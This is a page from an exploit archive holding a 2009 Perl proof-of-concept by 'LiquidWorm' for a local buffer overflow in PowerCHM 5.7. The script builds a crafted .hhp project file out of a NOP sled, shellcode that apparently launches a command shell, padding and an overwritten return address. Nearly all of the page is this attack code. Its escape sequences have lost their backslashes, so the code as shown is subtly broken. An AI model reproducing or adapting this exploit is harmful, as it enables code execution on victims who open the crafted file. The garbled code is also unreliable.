PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
# Published : 2009-03-29
# Author : LiquidWorm
# Previous Title : Trend Micro Internet Security Pro 2009 Priviliege Escalation PoC
# Next Title : pam-krb5 < 3.13 Local Privilege Escalation Exploit

#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs:	http://www.milw0rm.com/exploits/8300
#	http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#

my $header="
	[OPTIONS]n
	Compatibility=1.1 or latern
	Compiled file=zero.chmn
	Contents file=science.hhcn
	Index file=lqwrm.hhkn
	Binary Index=Yesn
	Language=0x042Fn
	Title=n
	Error log file=Errlog.txtn
	Default Window=mainnn
	[WINDOWS]n
	main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0nn
	[FILES]nn
	[INFOTYPES]n
	";


my $sc ="x8BxECx33xFFx57xC6x45xFCx63xC6x45".
	"xFDx6DxC6x45xFEx64xC6x45xF8x01x8D".
	"x45xFCx50xB8xC7x93xBFx77xFFxD0";


my $bof = "x90" x 568 . "$sc" . "x41" x 400 . "xe8xedx12x00" . "x42" x 500;

my $file = "Watchmen.hhp";
open (hhp, ">./$file") || die "nCan't open $file: $!";
print hhp "$header" . "$bof";
close (hhp);
sleep 1;
print "nFile $file successfully created!n";

# www.Syue.com [2009-03-29]